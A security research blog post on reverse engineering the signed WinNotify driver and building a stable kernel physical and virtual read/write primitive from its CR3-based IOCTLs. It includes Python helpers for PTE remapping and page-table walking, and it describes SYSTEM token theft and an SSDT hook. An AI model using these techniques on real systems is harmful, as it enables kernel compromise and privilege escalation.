WinNotify: Building Kernel Read/Write from CR3-Based IOCTLs
In this post I’m going to document some notes from reversing the WinNotify signed driver and turning its IOCTL interface into a stable kernel read/write primitive.
The driver has been discussed publicly before, but I still wanted to go through the binary myself instead of only following the released PoC. That ended up being useful. The public exploit takes the simple route: `0x22200C` for the kernel base, `0x222040` for kernel reads, and `0x222044` for VA writes through the driver's `memmove()` path.
What the original PoC uses:
0x22200C for module/kernel base
0x222040 for the 5-QWORD kernel read helper
0x222044 for the memmove() kernel VA write
Then it walks ActiveProcessLinks, reads the SYSTEM token, and writes it into the current process token.
The part I wanted to look at more closely was the CR3-based path exposed by `0x222000 / 0x222004`, which the article mentions but its exploit does not use. Those IOCTLs are more interesting for building a reusable memory backend because they accept a virtual address and a supplied DirBase, then rely on the driver's internal page-table walk to reach physical memory.
So this post picks up from that point: instead of stopping at token stealing with `memmove()`, I wanted to use the CR3 path to build a cleaner physical read/write layer.
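As a quick sanity check on the codes above, here is a minimal sketch that splits each IOCTL into the fields packed by the standard `CTL_CODE` macro. The helper name `decode_ioctl` is my own and is not taken from the driver or the PoC.

```python
from typing import NamedTuple

# Transfer methods, indexed by the low two bits of the control code
METHODS = ("METHOD_BUFFERED", "METHOD_IN_DIRECT", "METHOD_OUT_DIRECT", "METHOD_NEITHER")


class IoctlFields(NamedTuple):
    device_type: int
    access: int
    function: int
    method: str


def decode_ioctl(code: int) -> IoctlFields:
    """Split a 32-bit IOCTL into the fields packed by CTL_CODE."""
    return IoctlFields(
        device_type=(code >> 16) & 0xFFFF,  # 0x22 is FILE_DEVICE_UNKNOWN
        access=(code >> 14) & 0x3,          # 0 is FILE_ANY_ACCESS
        function=(code >> 2) & 0xFFF,
        method=METHODS[code & 0x3],
    )


for code in (0x222000, 0x222004, 0x22200C, 0x222040, 0x222044):
    f = decode_ioctl(code)
    print(f"{code:#x}: device={f.device_type:#x} access={f.access} "
          f"function={f.function:#x} {f.method}")
```

All five codes decode to `FILE_DEVICE_UNKNOWN`, `FILE_ANY_ACCESS` and `METHOD_BUFFERED`, with function numbers 0x800, 0x801, 0x803, 0x810 and 0x811.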
IOCTL Surface
After looking at the dispatch logic, the useful parts were the CR3-aware read/write path and the module/query helpers.
The exposed read primitive is not a physical address call. The driver takes a virtual address plus a CR3 and internally resolves the translation. That means the caller has to be very clear about which address space is being used.
The basic flow goes as follows:
1. get module base
2. get process CR3
3. use CR3-backed virtual read/write
4. build a controlled physical mapping layer
5. use that to implement stable VA reads/writes
There are two different CR3 concepts involved:
scratch CR3 -> address space where the temporary user mapping exists
translation CR3 -> address space being translated for target reads/writes
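One way to keep the two roles from getting mixed up is to store them in separate fields. This is only a sketch: the `Cr3Context` class and the example CR3 values are hypothetical and do not come from the driver.

```python
from dataclasses import dataclass
from typing import Optional

# Bits 12..51 of CR3 hold the physical base of the PML4;
# the low 12 bits carry flags or a PCID and must be masked off.
CR3_PFN_MASK = 0x000FFFFFFFFFF000


@dataclass
class Cr3Context:
    scratch_cr3: int                        # address space that owns the scratch VA
    translation_cr3: Optional[int] = None   # address space being walked

    def set_translation(self, cr3: int) -> None:
        # Only the translation side changes; the scratch side stays pinned.
        self.translation_cr3 = cr3

    def pml4_base(self) -> int:
        """Physical base of the PML4 used for page-table walks."""
        cr3 = self.scratch_cr3 if self.translation_cr3 is None else self.translation_cr3
        return cr3 & CR3_PFN_MASK


ctx = Cr3Context(scratch_cr3=0x1AD002)  # made-up current-process CR3
ctx.set_translation(0x1AA002)           # made-up SYSTEM DirBase
print(hex(ctx.scratch_cr3), hex(ctx.pml4_base()))
```

Switching the translation target never touches `scratch_cr3`, so reads through the scratch VA keep using the address space where that VA is actually mapped.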
Resolving Kernel Base
The kernel base is obtained through the driver’s module-list functionality. This is straightforward.
Once the ntoskrnl base address is known, symbols or local PE parsing can be used to resolve the offsets needed later. I used NTOSKernelWalkerLib to locate PsInitialSystemProcess, then used the read primitive to validate the rest of the context.
At this point the primitive is still not complete. Having the kernel base only tells us where to start.
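The rebasing step itself is simple arithmetic. The sketch below assumes the RVA of PsInitialSystemProcess has already been obtained from a local copy of ntoskrnl, and that `read_qword` is a callback wrapping whatever kernel read primitive is available. Both function names and all example values are hypothetical.

```python
from typing import Callable


def resolve_kernel_va(kernel_base: int, rva: int) -> int:
    """Rebase an RVA taken from a local ntoskrnl copy onto the live kernel base."""
    return kernel_base + rva


def read_system_eprocess(kernel_base: int, rva: int,
                         read_qword: Callable[[int], int]) -> int:
    # PsInitialSystemProcess is an exported pointer variable, so the resolved
    # address has to be dereferenced once to get the SYSTEM EPROCESS address.
    return read_qword(resolve_kernel_va(kernel_base, rva))


# Simulated kernel memory with made-up addresses, only to exercise the helpers
fake_memory = {0xFFFFF80000CFC420: 0xFFFF8A0000012040}
eprocess = read_system_eprocess(0xFFFFF80000000000, 0xCFC420, fake_memory.__getitem__)
print(hex(eprocess))
```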
The CR3 Bootstrap
The driver exposes logic to obtain a CR3 for a process. For this flow, the first CR3 I obtained was the current process CR3. That CR3 is saved as the initial CR3. Later, when the SYSTEM DTB (DirBase) is discovered, that value is used for translation, but it does not replace the initial CR3.
The model is:
current process CR3 -> used to access the initial VA
target/system CR3 -> used for page-table walking
This distinction is important because the initial virtual address belongs to the current process. If the code later tries to access that same VA through the SYSTEM CR3, the mapping is not guaranteed.
Next, PTE (Page Table Entry) Base
To build a physical read/write layer, I needed to temporarily remap an initial page to a chosen physical frame. For that, the backend needs the PTE address for a virtual address.
The relevant kernel flow follows this logic:
pte = pte_base + ((va >> 9) & mask)
PTE base is not hardcoded. It is resolved from the live kernel during runtime.
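The formula above can be written out as a small helper. The mask `0x7FFFFFFFF8` and the base `0xFFFFF68000000000` used here are the well-known fixed values from older Windows builds. They are only illustrative, since on current builds the base is randomized and has to be read from the running kernel.

```python
PTE_SHIFT = 9
LEGACY_PTE_BASE = 0xFFFFF68000000000  # fixed base on older builds, example only
LEGACY_PTE_MASK = 0x7FFFFFFFF8        # keeps a 39-bit, 8-byte-aligned offset


def pte_address(va: int, pte_base: int, pte_mask: int = LEGACY_PTE_MASK) -> int:
    """Return the virtual address of the PTE that maps `va`."""
    return pte_base + ((va >> PTE_SHIFT) & pte_mask)


# Each 4 KiB page advances the PTE address by 8 bytes (one 64-bit entry).
print(hex(pte_address(0x0000, LEGACY_PTE_BASE)))
print(hex(pte_address(0x1000, LEGACY_PTE_BASE)))
```

Shifting by 9 instead of 12 is just "page number times 8" in one step, and the mask drops the sign-extension bits and forces 8-byte alignment.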
The backend scans the live MiGetPteAddress function and extracts the immediate values used by the running kernel. Once resolved, the backend has these values:
PTE base
PTE mask
scratch VA
scratch PTE VA
original scratch PTE
With those, it can patch the PTE of the initial (scratch) page, use that page as a temporary physical window, and restore the PTE immediately after the operation.
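To illustrate the extraction step, here is a rough sketch that pulls the two 64-bit immediates out of a MiGetPteAddress-style byte sequence. It assumes the common layout (`shr rcx, 9`, `mov rax, mask`, `and rcx, rax`, `mov rax, base`, `add rax, rcx`, `ret`), which may differ between builds. The sample bytes are hand-assembled with the legacy base value and were not dumped from a live kernel.

```python
import struct
from typing import Tuple

MOV_RAX_IMM64 = b"\x48\xB8"  # REX.W + B8: mov rax, imm64


def extract_pte_constants(code: bytes) -> Tuple[int, int]:
    """Return (pte_base, pte_mask) from the first two `mov rax, imm64` operands."""
    immediates = []
    pos = 0
    while len(immediates) < 2:
        # Naive byte search; a real scanner should decode instructions properly.
        pos = code.find(MOV_RAX_IMM64, pos)
        if pos < 0 or pos + 10 > len(code):
            raise ValueError("expected two `mov rax, imm64` instructions")
        immediates.append(struct.unpack_from("<Q", code, pos + 2)[0])
        pos += 10  # skip opcode (2 bytes) plus immediate (8 bytes)
    mask, base = immediates  # assumed order: mask is loaded first, base second
    if base & 0x7FFFFFFFFF:
        raise ValueError("PTE base is expected to be 512 GiB aligned")
    return base, mask


SAMPLE = bytes.fromhex(
    "48C1E909"              # shr rcx, 9
    "48B8F8FFFFFF7F000000"  # mov rax, 0x7FFFFFFFF8
    "4823C8"                # and rcx, rax
    "48B80000000080F6FFFF"  # mov rax, 0xFFFFF68000000000
    "4803C1"                # add rax, rcx
    "C3"                    # ret
)

base, mask = extract_pte_constants(SAMPLE)
print(hex(base), hex(mask))
```

In the real backend the bytes would come from reading the function body through the kernel read primitive rather than from a hardcoded sample.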
Physical Read
Here is where the fun begins. The physical read flow is as follows:
1. Split the requested physical range by page
2. Save the current initial PTE
3. Replace the PFN in the initial PTE
4. Read from initial_va + page_offset using the initial CR3
5. Restore the original initial PTE
6. Continue with the next page
The initial page is only a window. It is not left mapped to arbitrary physical memory.
This is the part that made the primitive much more useful. The driver does not need to expose a clean raw physical read IOCTL. The backend can build one from the available CR3-backed access plus temporary PTE remapping, and yes, everything needed for that was exposed by the driver!
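The read loop described above can be sketched as follows. The three callbacks (`read_pte`, `write_pte`, `read_scratch`) are placeholders for the driver-backed operations and are assumptions of this sketch, as is the architectural PFN mask covering bits 12..51.

```python
from typing import Callable, Iterator, Tuple

PAGE_SIZE = 0x1000
PTE_PFN_MASK = 0x000FFFFFFFFFF000  # physical frame bits 12..51 of an x64 PTE


def split_by_page(pa: int, size: int) -> Iterator[Tuple[int, int, int]]:
    """Yield (page_base, page_offset, chunk_len) so no chunk crosses a page."""
    while size > 0:
        offset = pa & (PAGE_SIZE - 1)
        chunk = min(size, PAGE_SIZE - offset)
        yield pa - offset, offset, chunk
        pa += chunk
        size -= chunk


def retarget_pte(pte: int, page_base: int) -> int:
    """Keep the flag bits of `pte` and swap in the frame for `page_base`."""
    return (pte & ~PTE_PFN_MASK) | (page_base & PTE_PFN_MASK)


def phys_read(pa: int, size: int,
              read_pte: Callable[[], int],
              write_pte: Callable[[int], None],
              read_scratch: Callable[[int, int], bytes]) -> bytes:
    """Read `size` bytes of physical memory through the scratch window."""
    out = bytearray()
    for page_base, offset, chunk in split_by_page(pa, size):
        original = read_pte()                         # save the current PTE
        write_pte(retarget_pte(original, page_base))  # point the window at the frame
        try:
            out += read_scratch(offset, chunk)        # read via scratch VA + offset
        finally:
            write_pte(original)                       # always restore the PTE
    return bytes(out)


print(list(split_by_page(0x1FF8, 0x10)))
# -> [(4096, 4088, 8), (8192, 0, 8)]
```

A 16-byte read starting at 0x1FF8 becomes two 8-byte chunks, one per page, which is exactly the case where a single remap would otherwise read the wrong frame.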
Physical Write
Write follows the same idea:
1. Patch initial PTE to point at the target PFN
2. Write through the initial VA
3. Restore the original PTE
The restore step is not optional. Skip it and the system will eventually bugcheck.
If the process keeps a user VA mapped to some arbitrary physical page, later user-mode access can become unpredictable and unstable. It also makes debugging very difficult because the crash may happen much later than the bad remap.
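One way to make the restore hard to forget is to tie it to a scope. This is a minimal sketch using a context manager. `read_pte` and `write_pte` are hypothetical callbacks standing in for the driver-backed PTE access, and the PTE values are made up.

```python
from contextlib import contextmanager
from typing import Callable, Iterator


@contextmanager
def scratch_window(read_pte: Callable[[], int],
                   write_pte: Callable[[int], None],
                   new_pte: int) -> Iterator[None]:
    """Temporarily install `new_pte`, restoring the original even on error."""
    original = read_pte()
    write_pte(new_pte)
    try:
        yield
    finally:
        write_pte(original)


# Simulated PTE slot, only to show the restore behaviour
slot = {"pte": 0x0000000000001867}

try:
    with scratch_window(lambda: slot["pte"],
                        lambda v: slot.__setitem__("pte", v),
                        0x0000000000005867):
        # The write through the scratch VA would happen here.
        raise RuntimeError("simulated failure in the middle of a write")
except RuntimeError:
    pass

print(hex(slot["pte"]))  # the original value is back despite the exception
```

With this shape, a failed IOCTL or an exception in the middle of a write still leaves the scratch page pointing at its original frame.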
Virtual Read/Write
Once physical read/write works, virtual read/write becomes a page-table walker.
The backend walks:
PML4
PDPT
PD
PT
using the selected translation CR3.
For each VA, it resolves the final physical address, then uses the physical remapper to move the bytes.
This also handles page boundaries cleanly. Large reads are split so that each translated chunk stays inside the current page.
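The walk itself can be sketched as a standard x64 4-level translation. `read_phys_qword` is a placeholder for the physical read built earlier. The sketch treats any non-present entry as a failure, which is a simplification, since Windows also uses non-present PTE formats such as transition pages.

```python
from typing import Callable

PFN_MASK = 0x000FFFFFFFFFF000  # physical address bits 12..51 of an entry
PRESENT = 1 << 0
LARGE_PAGE = 1 << 7            # PS bit in a PDPTE (1 GiB) or PDE (2 MiB)


def translate(va: int, cr3: int, read_phys_qword: Callable[[int], int]) -> int:
    """Translate `va` to a physical address using the tables rooted at `cr3`."""
    table = cr3 & PFN_MASK
    # (shift, may_map_large_page) for PML4, PDPT, PD, PT
    for shift, may_be_large in ((39, False), (30, True), (21, True), (12, False)):
        index = (va >> shift) & 0x1FF
        entry = read_phys_qword(table + index * 8)
        if not entry & PRESENT:
            raise LookupError(f"entry not present at level with shift {shift}")
        if shift == 12 or (may_be_large and entry & LARGE_PAGE):
            page_mask = (1 << shift) - 1
            # Drop low bits of the frame (including PAT on large pages)
            return (entry & PFN_MASK & ~page_mask) | (va & page_mask)
        table = entry & PFN_MASK
    raise AssertionError("unreachable")


# Tiny simulated page-table hierarchy with made-up frames
mem = {
    0x1000 + 1 * 8: 0x2000 | 0x63,    # PML4[1] -> PDPT at 0x2000
    0x2000 + 2 * 8: 0x3000 | 0x63,    # PDPT[2] -> PD at 0x3000
    0x3000 + 3 * 8: 0x4000 | 0x63,    # PD[3]   -> PT at 0x4000
    0x4000 + 4 * 8: 0x5000 | 0x63,    # PT[4]   -> 4 KiB frame at 0x5000
    0x3000 + 5 * 8: 0xE00000 | 0xE3,  # PD[5]   -> 2 MiB large page at 0xE00000
}
va_small = (1 << 39) | (2 << 30) | (3 << 21) | (4 << 12) | 0x123
va_large = (1 << 39) | (2 << 30) | (5 << 21) | 0x12345
print(hex(translate(va_small, 0x1000, lambda pa: mem.get(pa, 0))))  # -> 0x5123
print(hex(translate(va_large, 0x1000, lambda pa: mem.get(pa, 0))))  # -> 0xe12345
```

Combining this with per-page splitting gives VA reads and writes: translate each chunk separately, then move the bytes through the physical window.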
And all together looks like this:
1. open driver
2. resolve ntoskrnl base
3. bootstrap current process CR3
4. save it as initial_cr3
5. resolve live PTE base/mask
6. allocate scratch page
7. resolve scratch PTE
8. save original scratch PTE
9. use initial page as temporary physical window
10. walk page tables with translation_cr3
11. expose stable kernel VA read/write
Most of the time spent here was not about finding the IOCTLs, as the article was quite clear on their research and I also did a vulnerability check using Driver Buddy Revolutions in Ghidra. It was about making the IOCTLs behave like PA RW + translation.
In this case, once the CR3 split and PTE remap flow were cleaned up, the backend became much more predictable and stable.
Hope you enjoyed this read. It was quite fun to make this one work as PA RW.
The following screenshot shows this exploit (PA RW) being used as a backend for DOG while doing an SSDT hook (code execution) to obtain an NT/SYSTEM shell via token swap.
